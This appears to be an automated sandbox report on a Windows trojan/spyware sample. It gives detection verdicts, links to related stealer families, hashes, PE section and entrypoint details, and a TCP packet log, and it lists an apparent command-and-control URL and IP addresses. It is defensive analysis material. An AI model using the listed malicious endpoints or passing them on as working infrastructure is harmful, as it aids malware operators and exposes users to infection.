                          Original Sample Name:5a249494869b3ef440bd31b438958585.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          03:02:11API Interceptor3x Sleep call for process: PqHnYMj5eF.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          5.101.3.217qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          3.218.7.103YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                            qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                              Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                  xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                    lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                      w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                        E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          httpbin.orgYrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                          • 3.218.7.103
                                          qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                          • 3.218.7.103
                                          Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                          • 3.218.7.103
                                          3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                          • 34.226.108.155
                                          4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                          • 34.226.108.155
                                          xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                          • 3.218.7.103
                                          lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                          • 3.218.7.103
                                          8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                          • 34.226.108.155
                                          w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                          • 3.218.7.103
                                          mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                          • 34.226.108.155
                                          home.fiveth5ht.topqZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          PINDC-ASRUqZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                          • 5.101.3.217
                                          6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                                          • 91.215.85.11
                                          Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                          • 91.215.85.142
                                          3cb770h94r.elfGet hashmaliciousOkiruBrowse
                                          • 45.145.172.130
                                          AMAZON-AESUSYrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                          • 3.218.7.103
                                          qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                          • 3.218.7.103
                                          Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                          • 3.218.7.103
                                          3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                          • 34.226.108.155
                                          DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                          • 3.218.7.103
                                          4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                          • 34.226.108.155
                                          xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                          • 3.218.7.103
                                          lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                          • 3.218.7.103
                                          8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                          • 34.226.108.155
                                          w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                          • 3.218.7.103

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          No created / dropped files found

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                          Entropy (8bit):7.984735710546458
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • VXD Driver (31/22) 0.00%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:PqHnYMj5eF.exe
                                          File size:4'495'872 bytes
                                          MD5:5a249494869b3ef440bd31b438958585
                                          SHA1:d3c4cfbca5b8b1d061ac2f55899dfefc49321cff
                                          SHA256:0783ed26022f0e0f99d7e6b72ee2d7d7372c97596249299275cc19db7b10a8c4
                                          SHA512:4e53ada8f3d08d925c67e2019bfb2a8f9f3f3bb9aba0005e91daa792ae3c953d047a1b1b408bc01336a15476546abd8781baa4ff0258c2714ef436c05f221180
                                          SSDEEP:98304:xN0oUxjY0eMGO8d3mrO85fIj4qmmgXVJPD+gq1Ec8jE:xqVE1MNW4q9UD+gWr2
                                          TLSH:072633441FED2268E65569709D7327CE3919CB241F645FAA00DECC6F2607ACF9E8B40E
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@..................................mE...@... ............................

                                          File Icon

                                          Icon Hash:90cececece8e8eb0

                                          Static PE Info

                                          General

                                          Entrypoint:0x103a000
                                          Entrypoint Section:.taggant
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                          DLL Characteristics:DYNAMIC_BASE
                                          Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                          Authenticode Signature

                                          Signature Valid:
                                          Signature Issuer:
                                          Signature Validation Error:
                                          Error Number:
                                          Not Before, Not After
                                            Subject Chain
                                              Version:
                                              Thumbprint MD5:
                                              Thumbprint SHA-1:
                                              Thumbprint SHA-256:
                                              Serial:

                                              Entrypoint Preview

                                              Instruction
                                              jmp 00007FBCB06E271Ah
                                              vmread dword ptr [eax+eax+00h], eax
                                              add byte ptr [eax], al
                                              add cl, ch
                                              add byte ptr [eax], ah
                                              add byte ptr [eax], al
                                              add byte ptr [ecx+00000000h], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [ebx], al
                                              or al, byte ptr [eax]
                                              add byte ptr [edx+ecx], al
                                              add byte ptr [eax], al
                                              or ecx, dword ptr [edx]
                                              add byte ptr [eax], al
                                              push es
                                              or al, byte ptr [eax]
                                              add byte ptr [ecx], al
                                              or al, byte ptr [eax]
                                              add byte ptr [edx], al
                                              or al, byte ptr [eax]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [esi], al
                                              add byte ptr [eax], 00000000h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              adc byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add al, byte ptr [00000000h]
                                              add byte ptr [eax], al
                                              and byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              or ecx, dword ptr [edx]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc3815c0x10qmfawksx
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0xc3810c0x18qmfawksx
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              0x10000x6db0000x288a003a9fe6a1fd581f394112f116260a451dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x6dc0000x1ac0x200311cbffd3577272a5abc3dc2561b20fbFalse0.58203125data4.557120694658716IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              0x6de0000x39d0000x200d53c502c8b859dc3db3a3dea5bc0f61funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              qmfawksx0xa7b0000x1be0000x1bd400b947a9c08f535fdffb9192dd98a41d44False0.9945058078326783data7.956234866264717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              zuykhosy0xc390000x10000x400350b3348ed876364031c0cd93c2cf3b3False0.7744140625data6.111002015318447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .taggant0xc3a0000x30000x2200dc0abff349a5674e8011c591ff8265e3False0.06560202205882353DOS executable (COM)0.8363550610050086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_MANIFEST0xc3816c0x152ASCII text, with CRLF line terminators0.6479289940828402

                                              Imports

                                              DLLImport
                                              kernel32.dlllstrcpy

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 27, 2024 09:01:57.716613054 CET49704443192.168.2.103.218.7.103
                                              Dec 27, 2024 09:01:57.716670990 CET443497043.218.7.103192.168.2.10
                                              Dec 27, 2024 09:01:57.716725111 CET49704443192.168.2.103.218.7.103
                                              Dec 27, 2024 09:01:57.729896069 CET49704443192.168.2.103.218.7.103
                                              Dec 27, 2024 09:01:57.729918957 CET443497043.218.7.103192.168.2.10
                                              Dec 27, 2024 09:01:59.582479954 CET443497043.218.7.103192.168.2.10
                                              Dec 27, 2024 09:01:59.583061934 CET49704443192.168.2.103.218.7.103
                                              Dec 27, 2024 09:01:59.583095074 CET443497043.218.7.103192.168.2.10
                                              Dec 27, 2024 09:01:59.584559917 CET443497043.218.7.103192.168.2.10
                                              Dec 27, 2024 09:01:59.584640026 CET49704443192.168.2.103.218.7.103
                                              Dec 27, 2024 09:01:59.586018085 CET49704443192.168.2.103.218.7.103
                                              Dec 27, 2024 09:01:59.586148024 CET443497043.218.7.103192.168.2.10
                                              Dec 27, 2024 09:01:59.598057032 CET49704443192.168.2.103.218.7.103
                                              Dec 27, 2024 09:01:59.598097086 CET443497043.218.7.103192.168.2.10
                                              Dec 27, 2024 09:01:59.640372992 CET49704443192.168.2.103.218.7.103
                                              Dec 27, 2024 09:01:59.927397013 CET443497043.218.7.103192.168.2.10
                                              Dec 27, 2024 09:01:59.927527905 CET443497043.218.7.103192.168.2.10
                                              Dec 27, 2024 09:01:59.927592039 CET49704443192.168.2.103.218.7.103
                                              Dec 27, 2024 09:01:59.950340986 CET49704443192.168.2.103.218.7.103
                                              Dec 27, 2024 09:01:59.950381041 CET443497043.218.7.103192.168.2.10
                                              Dec 27, 2024 09:02:02.252999067 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.372613907 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.372741938 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.373819113 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.493453979 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.493484974 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.493511915 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.493547916 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.493604898 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.493628979 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.493643999 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.493691921 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.493748903 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.493761063 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.493794918 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.493807077 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.493808031 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.493822098 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.493849039 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.493859053 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.613210917 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.613226891 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.613306046 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.613302946 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.613321066 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.613353968 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.613364935 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.613567114 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.613579035 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.613616943 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.654887915 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.655030966 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.774796009 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.774905920 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.814883947 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.814953089 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:02.934638977 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:02.934735060 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.115103960 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.115171909 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.351468086 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.351620913 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.418566942 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.418857098 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.418940067 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.471774101 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.471898079 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.538559914 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538584948 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538697004 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538708925 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538719893 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538741112 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538780928 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.538830996 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.538831949 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538852930 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538896084 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.538944006 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538963079 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538980007 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.538990974 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.539001942 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.539021969 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.539202929 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.539218903 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.539238930 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.539258957 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.539294958 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.539447069 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.539464951 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.539663076 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.539678097 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.539714098 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.539822102 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.539904118 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540011883 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540026903 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540155888 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540172100 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540323973 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540328026 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.540339947 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540360928 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540380955 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540384054 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.540396929 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.540421963 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.540523052 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540540934 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.540560007 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.540570021 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.586807013 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.586878061 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.591656923 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.591727972 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.658427954 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.658525944 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.658530951 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.658584118 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.658601046 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.658685923 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.658760071 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.658848047 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.658958912 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.658998966 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659081936 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659132004 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659209013 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659250021 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659332991 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659420967 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659440994 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659475088 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659490108 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659511089 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659801960 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.659807920 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659854889 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.659854889 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659904957 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.659909010 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659940004 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659956932 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.659972906 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.659976959 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.660017967 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.660075903 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660095930 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660115957 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660119057 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.660132885 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.660150051 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660155058 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.660188913 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660198927 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.660227060 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.660228968 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660269022 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.660284996 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660325050 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.660391092 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660410881 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660439968 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660495996 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660512924 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660568953 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660586119 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660640001 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660706043 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660725117 CET80497105.101.3.217192.168.2.10
